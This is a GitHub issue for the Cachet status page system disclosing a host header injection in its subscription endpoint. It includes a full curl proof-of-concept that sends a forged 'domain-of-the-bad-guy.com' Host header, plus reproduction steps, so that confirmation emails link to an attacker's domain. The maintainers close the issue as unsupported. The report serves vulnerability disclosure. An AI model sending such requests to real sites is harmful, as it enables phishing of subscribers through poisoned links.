search

cachethq / cachet

🚦 The open-source status page system.
https://cachethq.io
MIT License
13.98k stars 1.55k forks source link

Host Header Vulnerability in Subscription #4124

Closed chloesoe closed 1 year ago

chloesoe commented 3 years ago

Summary

It is possible set random Host header in POST cachet.example.com/subscribe and this Host is used in the mail confirmation link.

How to reproduce

With CURL you could create a POST request with Host domain-of-the-bad-guy.com, see below:

curl -X POST \
--http1.1 \
--cookie "__hs_opt_out=yes; _icl_visitor_lang_js=en; XSRF-TOKEN=eyJpdiI6ImU2NFdpdjY0YzZJSlwvXC9vMUZlOVZ5QT09IiwidmFsdWUiOiJKNGRhMzc1UzRZejNnbEo4Umt4SjlwRXZ4RTJpbHJ6OGZiSHY1a1F4WWM3SzAwUlZQdHBYTng0aG1BQ1pldWhydFRXZndJNjQ1YUVKcVBzQ3RtY1JXUT09IiwibWFjIjoiNTJmM2Y4OWM1ZTZhZDNhNjkzMWY2MDMwODBkYjNlNGFhMmM0YTRiMDQ0OTE2YjBkOGE3MmY4NGQ5NTk1Yzg0NiJ9; laravel_session=eyJpdiI6IkZcLzJOWFlLbFNyXC9halhEM2VveCtYZz09IiwidmFsdWUiOiJjUzl2K2lKaE0wSXdGQ25XRmRnaFFnSGxNcm85STY1bk1FWEVad3l5M25NQ1VpTW1adkk1NFRZbVlaQTFhZlFKTmlGRDBFcFBETjhSN3FiVFJzYU4wUT09IiwibWFjIjoiNzFjZDU4MjY3MDNhOTVjNTk3ZmFkNmE4ZTI2MzVkM2E5YWZjNmUyNmFlODQyZTMwOTQ2MmUxMDM2NmUzYmVmOCJ9" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \
-H "Accept-Language: en-US,en;q=0.5" -H "Content-Type: application/x-www-form-urlencoded" \
-H "Content-Length: 85" \
-H "DNT: 1" \
-H "Connection: keep-alive" \
-H "Referer: https://status.example.com/subscribe" \
-H "Upgrade-Insecure-Requests: 1" \
-H "Host: domain-of-the-bad-guy.com" \
-d "_token=PE8lTFJZfE0CIRHVn2vgDHFDfRsAUEpvBxodEydF&email=youraddress%2Btest1%40gmail.com" \
https://status.example.com/subscribe
  1. connect with a browser to https://status.example.com/subscribe and run a first subscription to youraddress+test1@gmail.com
  2. check in the network inspector (F12) of your browser. Look for the POST request and update the CURL request above:
    • Replace --cookie in CURL with value from your POST request
    • Replace -d "_token... with value from request payload.
    • Content-Length: 85 content length must be same length as request payload
  3. Send CURL and check your youraddress@gmail.com

You got an email to confirm your subscription. The confirmation URL points to the host domain-of-the-bad-guy.com from the Host header.

Selection_999(186)

Version

Reproduced in cachet version 2.3.18

welcome[bot] commented 3 years ago

:wave: Thank you for opening your first issue. I'm just an automated bot that's here to help you get the information you need quicker, so please ignore this message if it doesn't apply to your issue. If you're looking for support, you should try the Slack group by registering your email address at https://cachethq-slack.herokuapp.com. Alternatively, email support@alt-three.com for our Professional support service (please note, this a paid service.) If you're issue is with documentation, you can suggest edits by clicking the Suggest Edits link on any page, or open an issue at https://github.com/CachetHQ/Docs

jbrooksuk commented 1 year ago

Thank you for your input on Cachet 2.x. We are shifting our attention and resources to Cachet 3.x and will no longer be supporting the 2.x version. If your feedback or issue is relevant to the 3.x series, we encourage you to engage with the new branch.

For more information on the Cachet rebuild and our plans for 3.x, you can read the announcement here.

We appreciate your understanding and look forward to your contributions to the new version.